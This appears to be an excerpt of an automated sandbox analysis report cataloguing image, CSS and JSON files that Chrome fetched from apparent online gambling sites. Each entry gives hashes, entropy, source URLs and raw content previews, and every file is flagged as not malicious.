                                                                                                                                                          Preview:......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm...........-..".............................................D....A..!....)E.E.PP.......vs..zb..mNl..>....'c;gn].X....>.og+.o..+..4.(......................................................................................&............................!.1AQ 0@............]J.+.`.X+.`...........d../.$. ..U2....fS2...u3....gC:...Ca..6P.Ce..6x.6..3k...6..3k...6..3k..Ce..3e..3e..6P.Ca..6..t3..L.fS2...U2..L.d.$..|................J.X*W.*.(P.B......3...b0..n...cT.0..!b..O......#...!...8Y..ub.=lP. ..^..*?Z..........P.Qz....ui.H^....)=$....^.."4V<.#.A.>5......x.~>...OK.OK.OK.~>....x.x'......m..P.P.8....H....^_..B$.b.2...:....&.....H..pG[.Y..)SQ.T...M/.~.D..`R~.D..&..MbxhG.Ldp.*a1..1..e.)iiB. .B...............................P.0.........?..&?.1.c..1.c..H..H."D..$H."D....Hc..1.c..1.c.......d..$I.cd.l.,e..&.Y6.d["."...E.\/.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2110
                                                                                                                                                          Entropy (8bit):6.717290855263161
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:x/6/zNnwknA9Wp8+udiocJ313uBHFzXEqEshVeF:xSBwknmWp8jFJBHFzXfnhVeF
                                                                                                                                                          MD5:2033970D543016A4B4F6280371EC0B74
                                                                                                                                                          SHA1:6669D2E61CB773F43940146B51D20AA5C8CD02C8
                                                                                                                                                          SHA-256:00F9EB9FBD8C7BED73772C6A587EE88A338200D8C185F934B694EE39D6E287EE
                                                                                                                                                          SHA-512:BBAF878543D906AD18DC669A60E661ABA52F4FE6B47829080FBD81E8CC2961284334B353F89FEF876021F0DF8BE845B9F50A2457B042308AADCE96DF3345900D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR..............w=.....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmp:CreateDate="2023-07-19T12:07:20+08:00" xmp:ModifyDate="2023-07-24T11:26:29+08:00" xmp:MetadataDate="2023-07-24T11:26:29+08:00" xmpMM:InstanceID="xmp.iid:3bcaa9ea-8275-44ac-b756-3cdcceb0b46e" xmpMM:DocumentID="xmp.did:DA57DDF0F3A011E78438A8440354D38B" xmpMM:OriginalDocumentID="xmp.did:DA57
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 26 x 26, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1729
                                                                                                                                                          Entropy (8bit):7.26777357181042
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:v1hfvWwjx82lY2T3JVT5zRyJ3VlEpeG7JQieCtYJuPRMHK1HaWOjIkFG25BdSpfw:9ANn2NhpwJ3Xues2St0upMqwKoFJy7E
                                                                                                                                                          MD5:124FD6512C8333FEF3001D144961D3BC
                                                                                                                                                          SHA1:9B70AC5F12055B77507792F154C79466088D8042
                                                                                                                                                          SHA-256:5D52FE13181F4297F24EBAFF3A2D9AE39093B586E8E0D43746F8617758BB4B83
                                                                                                                                                          SHA-512:12C693B9CC591DF8319286C69F43E4D64D1B1DA2D2D6B376665B470CDC2226FF89B685208BA5AF41E4EB785C8514F36C9C6ECFF429102C6A863044757E9EA6D7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/index/383/menu/nv5.png
                                                                                                                                                          Preview:.PNG........IHDR..............JL.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:6C07B97E50A211E7962ACE6CF982F4B4" xmpMM:DocumentID="xmp.did:6C07B97F50A211E7962ACE6CF982F4B4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6C07B97C50A211E7962ACE6CF982F4B4" stRef:documentID="xmp.did:6C07B97D50A211E7962ACE6CF982F4B4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..~y...1IDATx..iHTQ...<....D.B..Q..-.!"-IZ&.$3,Z..5......!.2m1....E.*)...(..BD....-....y....}.....?.;..w.].]l7.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17388
                                                                                                                                                          Entropy (8bit):2.7010799008089723
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:wStYkEWmfURrBI5SxNXrNGDmGvsc5ZpSNJIsUviTrFTAOx2:wSWk655Q5SwG5viTJNx2
                                                                                                                                                          MD5:CE5E34D129CC6D05C61DA19D2622E53B
                                                                                                                                                          SHA1:6E923FD81192EED13C656E4F2C8F18F04A2FF280
                                                                                                                                                          SHA-256:22B24ADFDF564E096A0383E268D32C0634B4B05E1B324CAFF12796125D782237
                                                                                                                                                          SHA-512:4FD3A3662661270B32BAF0840D81BD360F29BEDDD683D88D9C1B2D03A62FEE22CB84B00352D855A239DFCC9D9F99A2617FC445CCC85B70C0B8BCABC1B972CECE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs...............=.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpRights:Marked>False</xmpRights:Marked>. <xmpMM:OriginalDocumentID>uui
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):639
                                                                                                                                                          Entropy (8bit):7.509783681171782
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7es/6T/2D8coBwnD2h29YzfdMv2vRaR4oKhJxVuv4WlmwG9Ce+PQXfhrl7:w/637BwnD2h2SMXRkJxk7lcCP47
                                                                                                                                                          MD5:053DF6E78F58F3AED38360F04C309008
                                                                                                                                                          SHA1:51F3572957204797FA3F29B0401431E593E23D91
                                                                                                                                                          SHA-256:8E156EB2A24AEA64CCCAE28F4C6F7260EF79F7EBA9D2199860F26B2D0C704056
                                                                                                                                                          SHA-512:5965A4AB2367DCCA461A11666D819A4E83E5E92F528BDD81590515DAC12F3CC4A2824B485D86389275F3A436C63AA268756F1A2C667222B3549673AFBA8BD889
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/game_vdd_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs................1IDATH...KTa...7.... !B.ETD..\..0....Q.....UdA.:WF .hU;7...#L..(.."B.Hg.i..Lw..f..<px....y.{.$.5uQm..Cx...GSb..G@/0.....^...........S.g.{`. .$$.S.WIm..xNR^R......M..ebnK.)....6n.z....`.Xv.y`.....}..._.....K...W.Q')G\..h2~..2........M.......=..(.0?_.Q...eR..|..~..:...sx..?..>.o.P.R.E..N{....r6v...p.xc...._....:....f..K.C,M.C%xM....)<.f....78..........j._sI....!.....J.....LJp.OaO..k....q1..3.l\t..'3...9..L.0..3H.&....P.......M..d...nB....VD.&.{.]t....(.g%.....wYR.0.f%=/..Y%.II.V....|..=..w.|...w..l........n...b.Y.[.lL...C....~.&....ui.....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 11 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1205
                                                                                                                                                          Entropy (8bit):6.647003496408082
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:RhY1hfvWwjx82lY2T3JVbG/oyJ3Vb5TGmPiSxRW2Hr:DWANn2NgrJ3HriSv1r
                                                                                                                                                          MD5:C1EBFF4C49FB0032D2EB0034053FD92E
                                                                                                                                                          SHA1:9B84DB8909221522C8078FC94E112A575A9037A0
                                                                                                                                                          SHA-256:B46BA1D2208BC195218161642DA8FC5DA46B17F48EE7B89482DBE2589C7A7DC6
                                                                                                                                                          SHA-512:6EC5CAFE4997B61DAC8A4B80AF661AF2B1FCE1C65006E63687D36C48030120B8093A78E538021414BD6EB454FA5F756287DBE885CC39CF8077834EC12984F8A4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/index/383/login/icon2.png
                                                                                                                                                          Preview:.PNG........IHDR..............a.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:8D7AEBD350A211E7A6B9B6765F8E393D" xmpMM:DocumentID="xmp.did:8D7AEBD450A211E7A6B9B6765F8E393D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8D7AEBD150A211E7A6B9B6765F8E393D" stRef:documentID="xmp.did:8D7AEBD250A211E7A6B9B6765F8E393D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..=....%IDATx.L.O+DQ...3W..DSJ,.I...o@....Db...X(.e.....)!..*..j..(..R6B...G..9...y~...n.x.h...:.MX.....1.1..T.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18388
                                                                                                                                                          Entropy (8bit):4.351571195978757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:sPrmmNeqmORafrtTThDeJ+GgJttHVENDYXdk0hfbwSr:0rmFORstThDeJtgJtFVENMXdkMBr
                                                                                                                                                          MD5:AB2CBE8957927CF9923F1435AA517BC8
                                                                                                                                                          SHA1:C1F5439091C7914EE2E65D8E9E4DC31A17327AEC
                                                                                                                                                          SHA-256:36BFC70E4B7D8EE7D2C3687C8F704AE2021A8F1F61FF31AD71C6227C602391D7
                                                                                                                                                          SHA-512:9A51747CC8D842CDF60CD433964529A5CBDD02E83D2972D8059B5935F7EF912757FF4461E757B5F662195F22A86B65F7969151BF9DAA303B5F55FF483C6C6266
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{. "nnn": "outer-888",. "versions": {. "zb_m": "240606-01",. "zb_pc_member": "240529-01". },. "http": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1585","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1985"]. },. "https": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1586","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1986"]. },. "public_domain": ["cppublbyv2-ali.epie3d.com", "cppublbyv2-hw.zjbxxy.com", "cppublbyv2-ty.huliancc.com"],. "gb_app_ins_domains": ["appiso-ty.souzhanzx.com:1066", "appiso-ty.zvbzjsb.com:8066"],. "gb_plist_api_domains": ["qpplist.lcyj888.com"],. "gb_wx_proxy": "https://wy-ali.meriksenrusso.com",. "gb_disabled_proxy": true,. "gb_is_pc_sp
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):38521
                                                                                                                                                          Entropy (8bit):7.98728190285807
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:lF+OhiCJ1iEqZNgyDu6t0MsKwGduOh4XxjQRcx8iagoOaI8Hq6bEhm1z+:v+uJslZNgR6tvs1S4X6Rcx8iaCaIsq6W
                                                                                                                                                          MD5:3FFA00B366D1E092F3A7CE8289BCBD82
                                                                                                                                                          SHA1:7AF30AF304E3ED541ADE1ABC1A434DC4CC5563F4
                                                                                                                                                          SHA-256:5617BCBCC41F114416D44B8211991DC43935010967B096165C3B93A1F1467C7D
                                                                                                                                                          SHA-512:8C9E71B68B5BF869C6D3F576FE5C0AD2B51D9444C81DC3297D84BB54A8450F72749B93519C329DE0AB0EF502EB949F33E17D619176529A7F4DB500AFD34159F4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...w.%Wu...v.....sRV+.........l...H.....`...3`r4...6. .P.P.-..[.n.|O....G..."I..g.of.S.}.9u..^....z......~...o.O.d~.t....o&..'o=....*.u&.g\......?...O....z.w..7 Y...xF....Q...w.......d....... 3.S...gK8..F............3....%.........t....i..~-.,.OX.....E..0.......g%.W....?~..]..!.?..?...?.x..?..Oe......}x.8...&.n.3.)...#...}..........n....._...lN......<.7..dy',\.....%.p..`..$..1...c..s....R....x.S,.O.Xd..Br.k^}.RJ...om.r...)r..m..+._.wG....^....^s..i.."...!C....... .x...x.....O..,/&.y..8..].<......k...f2_.............Wqnw.X ."..D..}.....Eq..."..N.......U..+..(...3P........... ,f0.....q(..H....z....[...... '9.].y.B..>...a.%.......zY<...................D.#... ' Z...zaO./.E.%.<..!.(.ut8$P%w.....@..3..1...FA.r.%...k...K.......%.!.J... .<.Uo.^...7Pc......7..(...c . \...`..x.....k.n..qw.<.P....2/z.o....Z*.t.E...3.X[...G..qg~j..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1123
                                                                                                                                                          Entropy (8bit):5.493713337336767
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:YvZLFLJxw8R5RWorwilPEIuhF7i+xRH9/pHBLgIugTIRgeRB/Krfjj:Yv1FLJxwewo9BGNhLgPNgsKz
                                                                                                                                                          MD5:D01102906EF6E32E787C27616CA415E3
                                                                                                                                                          SHA1:A5B7E8CEBC290634EAE62FAADB5FEBD98C85F085
                                                                                                                                                          SHA-256:7D79BCB4E392A105BB7031DCB3BC6FB4EC802B2B235326B66911C150EDC99E23
                                                                                                                                                          SHA-512:97E0997BCFFAD961ADB1407F3B8A78CBD1623E904F7A3F47ACFADB1B98C1ED9D4F7F6163E1FA442491615059C53C067227EF16D338CDD8A5382CC218D4AC65AA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', 'c0f51ba154f1c0d141fccf42aa8b5791');","domainType":1,"snType":1,"agentCode":"","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"ll12","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{},"httpsEnabled":0,"loginBg":null,"webPath":"t4091","httpsSupport":0,"analyticsJs":"","loginLogo":null,"name":".......","onlineCustomerServiceUrl":"https://hg2.jxxh8.icu/chatlink.html","preventPageFlag":1,"currencyCode":"CNY","icon":"/fileupload/ll12/202312/202312180557505.png","snStatus":1,"webTitle":"....","isMaintain":0,"i
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (823), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):823
                                                                                                                                                          Entropy (8bit):4.974800086001171
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:N+KqXZuq2Zqoiedh1cCMKQYcQbcDLKJcww+:NKe5H1c2cecAcwN
                                                                                                                                                          MD5:52385F65CE1A204CED660AD6D6FEC49F
                                                                                                                                                          SHA1:015DA85FE677E3AC6B787EC85DCDFFCE6B1BD8C4
                                                                                                                                                          SHA-256:F75B1A3B7C9491C5D617760E6ACDAC309B5FBFE5FE31E39ABDC4BC0D3E00A0D7
                                                                                                                                                          SHA-512:AD53881C5E46CAB4717690C1F47EB7DB35730305FF51E53E8B6B743AC16B605330E16C5C1389DD0EDBF9C170CEB75D6D849F0ADB1D07C119826DDE38D233D936
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/themes/default/jquery/plugins/jquery.poshytip/poshytip.css
                                                                                                                                                          Preview:.poshytip{opacity:.8;z-index:9999;text-align:left;border-radius:4px;-moz-border-radius:4px;-webkit-border-radius:4px;padding:8px 8px;color:#fff;background-color:#000}.poshytip .tip-inner{font:bold 11px/14px 'Lucida Grande',sans-serif}.poshytip .tip-arrow-top{margin-top:-5px;margin-left:-5px;top:0;left:50%;width:9px;height:5px;background:url(poshytip_arrows.gif) no-repeat}.poshytip .tip-arrow-right{margin-top:-4px;margin-left:0;top:50%;left:100%;width:5px;height:9px;background:url(poshytip_arrows.gif) no-repeat -9px 0}.poshytip .tip-arrow-bottom{margin-top:0;margin-left:-5px;top:100%;left:50%;width:9px;height:5px;background:url(poshytip_arrows.gif) no-repeat -18px 0}.poshytip .tip-arrow-left{margin-top:-4px;margin-left:-5px;top:50%;left:0;width:5px;height:9px;background:url(poshytip_arrows.gif) no-repeat -27px 0}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 21 x 19, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):426
                                                                                                                                                          Entropy (8bit):7.234803058415267
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7E/6T+TG9P5yKiam7OOvRwtJTGZ9MYAFBaF:5/6aGjlF0+tJTGvMYA2F
                                                                                                                                                          MD5:2632B0D08B13A16FA339EEF60042EB1B
                                                                                                                                                          SHA1:5763D0BEFD2B80C5DB3ECA3EBB34D54BA0017D87
                                                                                                                                                          SHA-256:32AC525BBC14EE8CBE070238864212AD1A26C52128E5E0FB4B558ADE21117B2B
                                                                                                                                                          SHA-512:6AD87638DF618310C95C7C32F62713ABE07575343FDB93700615B4EB33F6B816F00B9A4CD95695453F18860C8A4FBC19DCD8D8CE26D7F31CC8B6CF24BC5B92B7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/news/icon_news.png
                                                                                                                                                          Preview:.PNG........IHDR..............NF.....pHYs................\IDAT8...;K.A....n.E!(.lD.`.R$..(......F...Fb.:.".X.H*o.........$E@B..AQ.+X.cX.v.}`......93..A..e......J.....|.T.7W....^El..}.u.....2.F.E....(O.i..QS.8....j.z\.M.x.v..H..`.......!..=....{lKJ.....j......Iw|...j.........j..d..`.U.....X...?.Jyr.t.s...._.a..}:....j.Y..G......<.&^Dd.~.......aI....gx.C.}...f.B....n.v.........o$...oq......=..a.{....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):20027
                                                                                                                                                          Entropy (8bit):7.963371497875305
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:ITa1uA+fOWplgEF9zASXi/D/tvBmkNr8rG5mn3kMFen:ITaC5peEj01Q8r75CzFen
                                                                                                                                                          MD5:CFF93AD3AF5B98A472DCD451E0E50CAC
                                                                                                                                                          SHA1:2DF7BB9E726A9992EFBF691D69661D84F96AB5B9
                                                                                                                                                          SHA-256:CB9A7B35081FE5D28C85E543DC38AE3E8174FCD9A228094C4E29FE96C57BD6B9
                                                                                                                                                          SHA-512:3784694E01625E7A473962E4D71BC9947A94870B5E1041E93677A59B8FFD8D28C89792139CF7631561CD2C8C368B6148E9D64910C3673B413C9189E6B5FE4C03
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/video/sunbet_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BDA0C9838D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BDA0C9828D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 6 x 10, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):213
                                                                                                                                                          Entropy (8bit):6.479893584789263
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:6v/lhPiJtO/6Tx5jb0uMK2ytfYEtzQWxZRXxOqREQTp:6v/7KJtO/6T/j7U6YEtrxZCqR9
                                                                                                                                                          MD5:D234561621A0C14AFE7535FD1963DC85
                                                                                                                                                          SHA1:E0224B5757CEF37B6564D327F544094A471EDEEE
                                                                                                                                                          SHA-256:3A47848A34A63B55E2CA766FA161811C39C5E93CD1C249E2AA4B0621DCA27CA8
                                                                                                                                                          SHA-512:DAFD78E86E9BB1FCE5F4092C56A62AA1A8B1533A0DB2490E29D602D4857D2DF284A6E043C241DC9368249D28BBFD5C0B3E14DC8E42E352C3FFA427ADE95855F0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............../3....pHYs.................IDAT..e.1..P.D...C..,lS.{.Ocn.../....,.}.4..g."?H..if.y,.q..e......XO.V<.a.l.|E..-........>[O.I.+.. J......Q../.ezf.@.+Qvc8..Ju.x....65R4......IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):76
                                                                                                                                                          Entropy (8bit):4.05560346867421
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:xPX38/ZoS+NT/ZoS8/ZoS8/ZoS8/ZYn:xPn8/ZoSyT/ZoS8/ZoS8/ZoS8/ZYn
                                                                                                                                                          MD5:DCB18462446ABB1828105B326EA586A1
                                                                                                                                                          SHA1:0FD2FCF67CB8A0764418018F9A74176EF76DF996
                                                                                                                                                          SHA-256:07B81388CEC7E395783817D5AC4375B398005B5EAA6DF59085D7157CF876B755
                                                                                                                                                          SHA-512:7CBC5B0108ADA8BF24F6B969A9353953BCFA9DFFDDBA31C71062BB4B3C610A3FCD0964CC8F23ABAC0B02F393174D17119A658B24023E477FB5F8549C0991AB80
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISMwkLd4mLStX8mBIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVTg==?alt=proto
                                                                                                                                                          Preview:CjYKBw2RYZVOGgAKBw01hlQcGgAKBw2RYZVOGgAKBw2RYZVOGgAKBw2RYZVOGgAKBw2RYZVOGgA=
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 334 x 81
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):54005
                                                                                                                                                          Entropy (8bit):7.9268308323455505
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BW5k9zJQs7ST42qr3RefF2JfF2JfF2JfF2Jfw:fJZSM2w3oEJEJEJEJ4
                                                                                                                                                          MD5:029F0588D3E01F646F6C79DD0CE09BD8
                                                                                                                                                          SHA1:FFD6B7A621A8FB426560F70C88EFDBBE5DFFED3B
                                                                                                                                                          SHA-256:3B448593B8E3DD71F01E8FB59B41D4F267389082B47B9FB381743BC4CAA5DF20
                                                                                                                                                          SHA-512:3D3776FF66E29B10820681D3FA991EA07AE270FB0192694E502CA6CDD18DC17C56783D25EFEE582DD8F0FB6EEED00AA8574C2A89B03D82DDF931227773FF239B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/37a8a24f17444e01c16fc74cec5c8d23.gif
